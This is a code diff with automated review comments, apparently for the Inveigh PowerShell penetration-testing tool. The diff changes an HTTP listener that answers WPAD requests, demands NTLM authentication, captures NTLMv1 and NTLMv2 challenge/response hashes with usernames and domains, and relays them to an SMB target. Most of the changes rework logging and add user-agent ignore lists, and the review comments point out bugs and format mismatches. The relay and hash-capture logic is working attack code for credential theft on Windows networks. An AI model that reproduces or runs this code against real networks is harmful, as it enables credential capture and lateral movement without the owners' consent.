+ $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
+
+ if($TCP_request -like "*-48-6F-73-74-3A-20-*")
+ {
+ $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 19)
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length)
+ }
+
+ if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
+ {
+ $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37)
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
+ }
+
+ if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
+ }
+
+ if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
+ }
+
+ }
+
+ }
if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
{
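Review bot: the `ProxyIgnore` test changed from `$HTTP_header_user_agent.contains($_)` to `$HTTP_header_user_agent -match $_`, so each entry is now a .NET regular expression rather than a literal substring (and case-insensitive, where `.contains()` was case-sensitive); user-agent fragments containing `.`, `(`, `+` or `|` will match more broadly than intended. Either document that the parameter takes regex patterns or wrap the entry in `[regex]::Escape($_)`. The `+19` and `+37` offsets are right: they equal the lengths of the hex search strings `-48-6F-73-74-3A-20-` and `-55-73-65-72-2D-41-67-65-6E-74-3A-20-`, whereas the old `+18`/`+36` left a leading `-` in the substring and produced an empty token for `Split`. One more point on these headers: Host and User-Agent are decoded from client-supplied bytes and written straight into the console queue and log; extraction stops at the first CRLF so a whole forged line cannot be injected, but other control characters pass through, so strip non-printable characters before logging.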
@@ -2754,10 +3076,12 @@ $HTTP_scriptblock =
$HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length)
}
- if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous'))
+ if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or (
+ $HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -like 'NTLM*' -and $WPADAuthIgnore.Count -gt 0 -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
{
$HTTP_response_status_code = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
+ $HTTP_client_close = $true
}
else
{
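Review bot: `$HTTPAuth -eq 'Anonymous'` in the first alternative refers to a variable that is not declared in this scriptblock's `param(...)` list (the list carries `$WPADAuth` and the new `$WPADAuthIgnore` but no `$HTTPAuth`). Unless it is injected through the runspace's session state, it is `$null` inside the scriptblock, the comparison is always false, and non-wpad requests can never take the anonymous path. Either add it to the parameter list and its caller or remove the dead alternative. The same regex caveat applies to `$WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_}`: entries are regular expressions, not literal strings. The line break after `-or (` is valid because the open parenthesis keeps the expression going, but assigning the wpad/NTLM/ignore-list test to a named boolean first would let the three alternatives read on one line.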
@@ -2774,71 +3098,34 @@ $HTTP_scriptblock =
}
$HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
- }
-
- $NTLM = "NTLM"
- $NTLM_auth = $false
- $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
-
- if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
- {
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")])
-
- if($TCP_request -like "*-48-6F-73-74-3A-20-*")
- {
- $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 18)
- $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-"))
- $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")])
- }
-
- if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
- {
- $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 36)
- $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
- $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")])
-
- if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)}))
- {
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")])
- }
-
- }
-
+ $HTTP_client_close = $false
}
if($HTTP_header_authorization.StartsWith('NTLM '))
{
$HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ',''
[Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization)
-
- if($proxy_listener)
- {
- $HTTP_response_status_code = 0x34,0x30,0x37
- $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
- }
- else
- {
- $HTTP_response_status_code = 0x34,0x30,0x31
- $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
- }
if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
{
if($inveigh.SMB_relay -and $HTTP_source_IP -ne $Target -and $relay_step -eq 0)
{
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by $HTTP_source_IP")
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $Target)
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by $HTTP_source_IP")
+ $inveigh.log.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $Target)
+ }
+
$inveigh.console_queue.Add("$HTTP_type to SMB relay triggered by $HTTP_source_IP at $(Get-Date -format 's')")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by $HTTP_source_IP")])
$inveigh.console_queue.Add("Grabbing challenge for relay from $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $Target)])
$SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
$SMB_relay_socket.Client.ReceiveTimeout = 60000
$SMB_relay_socket.Connect($Target,"445")
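Review bot: `$NTLM_auth = $false` is removed from the per-request setup without a visible replacement; if any later branch still reads `$NTLM_auth`, it will now retain its value from the previous request across loop iterations. Grep for the name before merging. In the same hunk the `if($proxy_listener) {...407...} else {...401...}` block that set `$HTTP_response_status_code` and `$HTTP_header_authenticate` is removed from the `StartsWith('NTLM ')` branch, so for type-1 messages both values must now come entirely from the `else` branch above it (the hunk shows that branch setting `$HTTP_response_phrase` to Unauthorized and `$HTTP_client_close = $false`); confirm that the status code and the authenticate header are still assigned there for both the proxy and the plain listener cases.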
@@ -2848,8 +3135,18 @@ $HTTP_scriptblock =
if(!$SMB_relay_socket.connected)
{
$inveigh.console_queue.Add("SMB relay target is not responding")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")])
$relay_step = 0
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay target is not responding")
+ }
+
}
if($relay_step -eq 1)
@@ -2900,10 +3197,21 @@ $HTTP_scriptblock =
$NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
$inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge)
$inveigh.console_queue.Add("Received challenge $NTLM_challenge for relay from $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $Target")])
- $inveigh.console_queue.Add("Providing challenge $NTLM_challenge for relay to " + $HTTP_source_IP)
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to " + $HTTP_source_IP)])
+ $inveigh.console_queue.Add("Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
$relay_step = 2
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $Target")
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $Target")
+ $inveigh.log.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
+ }
+
}
else
{
@@ -2919,7 +3227,6 @@ $HTTP_scriptblock =
}
elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
{
- $NTLM = 'NTLM'
$HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
$HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
$HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
@@ -2961,9 +3268,18 @@ $HTTP_scriptblock =
$HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
- {
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type $NTLM_type challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")])
+ {
$inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type $NTLM_type challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type $NTLM_type challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
+ }
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
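Review bot: the new file and in-memory entries drop the space before the parenthesised hostname (`captured from $HTTP_source_IP($HTTP_NTLM_host_string)`) while the removed line and the console message in the next hunk keep it (`$HTTP_source_IP ($HTTP_NTLM_host_string)`); the same applies to the NTLMv2 hunk below. Keep one format so anything splitting the log on whitespace does not see the IP and hostname as one token.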
@@ -2971,7 +3287,7 @@ $HTTP_scriptblock =
}
else
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
@@ -2997,8 +3313,17 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")])
$inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
+ }
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
@@ -3006,7 +3331,7 @@ $HTTP_scriptblock =
}
else
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
@@ -3026,7 +3351,6 @@ $HTTP_scriptblock =
$HTTP_response_status_code = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
- $NTLM_auth = $true
$HTTP_client_close = $true
$NTLM_challenge = ""
@@ -3042,26 +3366,35 @@ $HTTP_scriptblock =
if($inveigh.SMBRelay_failed_list -notcontains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $Target")
{
- if($NTLM_type -eq 'NTLMv2')
+ if($inveigh.file_output)
{
- $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")])
- SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID
- $relay_step = 0
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")
}
- else
+
+ if($inveigh.log_output)
{
- $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")])
- SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID
- $relay_step = 0
+ $inveigh.log.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")
}
+ $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")
+ SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID
+ $relay_step = 0
+
}
else
{
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")
+ }
+
$inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")])
$SMB_relay_socket.Close()
$relay_step = 0
}
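Review bot: the console entry says `Aborting SMB relay since ...` while the file and in-memory entries for the same event say `Aborting relay since ...` (the two hunks that follow have the same mismatch for the machine-account and username-list cases); pick one wording so the console and the log can be correlated by message text. Collapsing the two identical `NTLMv2`/`else` branches into one is correct, since both bodies were the same.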
@@ -3069,8 +3402,18 @@ $HTTP_scriptblock =
}
else
{
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")
+ }
+
$inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_user_string appears to be a machine account")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")])
$SMB_relay_socket.Close()
$relay_step = 0
}
@@ -3078,8 +3421,18 @@ $HTTP_scriptblock =
}
else
{
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")
+ }
+
$inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on SMB relay username list")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")])
$SMB_relay_socket.Close()
$relay_step = 0
}
@@ -3088,32 +3441,18 @@ $HTTP_scriptblock =
if($proxy_listener)
{
- $HTTP_client.Client.Close()
+ $HTTP_send = $false
}
}
else
{
- $NTLM = "NTLM"
$HTTP_client_close = $false
}
}
- else
- {
-
- if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
- {
- $HTTP_client_close = $true
- }
- else
- {
- $HTTP_client_close = $false
- }
-
- }
- if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)})))
+ if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
{
$HTTP_message = $WPADResponse
$HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig")
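Review bot: `$HTTP_send = $false` replaces closing the proxy client, but nothing in this hunk sets `$HTTP_send` back to `$true`; unless it is reset at the top of each request iteration, once one proxy response is suppressed every later response from that listener runspace is skipped by the `if($HTTP_send)` guard added further down. Separately, changing the ProxyIgnore test from `$HTTP_header_user_agent.contains($_)` to `$HTTP_header_user_agent -match $_` turns each ProxyIgnore entry into a case-insensitive regex instead of a case-sensitive literal substring, so entries containing `.`, `(` or `+` now need `[regex]::Escape($_)`, or the help text should say the list takes patterns.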
@@ -3124,15 +3463,10 @@ $HTTP_scriptblock =
$HTTP_header_content_length = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
- if($HTTP_request_raw_URL -notmatch '/wpad.dat' -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth)
+ if($HTTP_request_raw_URL -notmatch '/wpad.dat' -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$HTTP_client_close)
{
$HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
}
- else
- {
- $HTTP_response_status_code = 0x32,0x30,0x30
- $HTTP_response_phrase = 0x4f,0x4b
- }
$packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary
$packet_HTTPResponse.Add("HTTPResponse_RequestVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20))
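Review bot: swapping `!$NTLM_auth` for `!$HTTP_client_close` while deleting the `else` that set `$HTTP_response_status_code`/`$HTTP_response_phrase` to `200`/`OK` means a response on a connection marked for close now carries whatever status an earlier branch assigned; with the anonymous wpad.dat `else` block also removed in the previous hunk, please confirm every path that sets `$HTTP_client_close = $true` also sets the status line, otherwise a stale status can go out. Writing the condition as `(... -notmatch '/wpad.dat' -or (...)) -and !$HTTP_client_close` would make the intended grouping explicit instead of relying on operator precedence.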
@@ -3157,17 +3491,30 @@ $HTTP_scriptblock =
$packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a))
}
- $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes)
- $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse
- $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
- $HTTP_stream.Flush()
+ if($HTTP_send)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes)
+ $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse
+ $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
+ $HTTP_stream.Flush()
+ }
+
Start-Sleep -m 10
$HTTP_request_raw_URL_old = $HTTP_request_raw_URL
$HTTP_client_handle_old = $HTTP_client.Client.Handle
if($HTTP_client_close)
{
- $HTTP_client.Close()
+
+ if($proxy_listener)
+ {
+ $HTTP_client.Client.Close()
+ }
+ else
+ {
+ $HTTP_client.Close()
+ }
+
}
}
@@ -3188,9 +3535,10 @@ $HTTP_scriptblock =
$HTTP_listener.Stop()
}
+# Control Relay Loop ScriptBlock
$control_relay_scriptblock =
{
- param ($RelayAutoExit,$RunTime)
+ param ($ConsoleQueueLimit,$RelayAutoExit,$RunTime)
function StopInveigh
{
@@ -3215,44 +3563,57 @@ $control_relay_scriptblock =
catch
{
$inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
if($inveigh.file_output)
{
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
}
}
}
+
+ Start-Sleep -S 1
+ $inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')")
- if($inveigh.running)
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
+ }
+
+ Start-Sleep -S 1
+ $inveigh.running = $false
+
+ if($inveigh.relay_running)
{
Start-Sleep -S 1
- $inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message") > $null
- Start-Sleep -S 1
- $inveigh.running = $false
+ $inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')")
if($inveigh.file_output)
{
- "$(Get-Date -format 's') - Inveigh exited due to $exit_message" | Out-File $Inveigh.log_out_file -Append
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
}
- }
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
+ }
- Start-Sleep -S 1
- $inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message") > $null
- Start-Sleep -S 1
